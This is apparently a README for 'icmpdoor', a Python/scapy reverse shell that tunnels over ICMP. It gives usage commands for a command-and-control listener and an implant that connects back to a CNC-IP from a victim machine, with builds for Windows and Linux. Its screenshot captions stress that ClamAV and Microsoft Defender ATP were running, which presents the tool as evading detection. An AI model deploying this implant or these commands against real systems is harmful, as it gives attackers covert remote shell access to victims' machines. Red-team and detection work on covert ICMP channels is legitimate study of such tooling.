icmpdoor - ICMP Reverse Shell

icmpdoor is an ICMP rev shell written in Python3 and scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10.

Python version usage (both Windows and Linux):

./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control)
./icmpdoor.py -i INTERFACE -d CNC-IP (Implant)

Binary Windows version usage version:

./icmp-cnc.exe -d VICTIM-IP (Command and Control)
./icmpdoor.exe -d CNC-IP (Implant)

Binary Linux version usage version:

./icmp-cnc -d VICTIM-IP (Command and Control)
./icmpdoor -d CNC-IP (Implant)

Parameters details:

  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Listener (virtual) Network Interface (e.g. eth0)
  -d DESTINATION_IP, --destination_ip DESTINATION_IP
                        Destination IP address
  exit                  Exit Command and Control (E2)

Screenshots

Screenshot 1 and 2 shows how icmpdoor works on Ubuntu 20.04, Debian 10 (Kali Linux) and Windows 10. ClamAV is active on Ubuntu 20.04:
68747470733a2f2f63727970747375732e636f6d2f626c6f672f69636d702d726576657273652d7368656c6c2d6c696e75782e6a7067
Microsoft Defender Advanced Threat Protection (ATP) is active on the Windows 10 Enterprise machine:
68747470733a2f2f63727970747375732e636f6d2f626c6f672f69636d702d726576657273652d7368656c6c2d77696e646f77732e6a7067

GitHub

https://github.com/krabelize/icmpdoor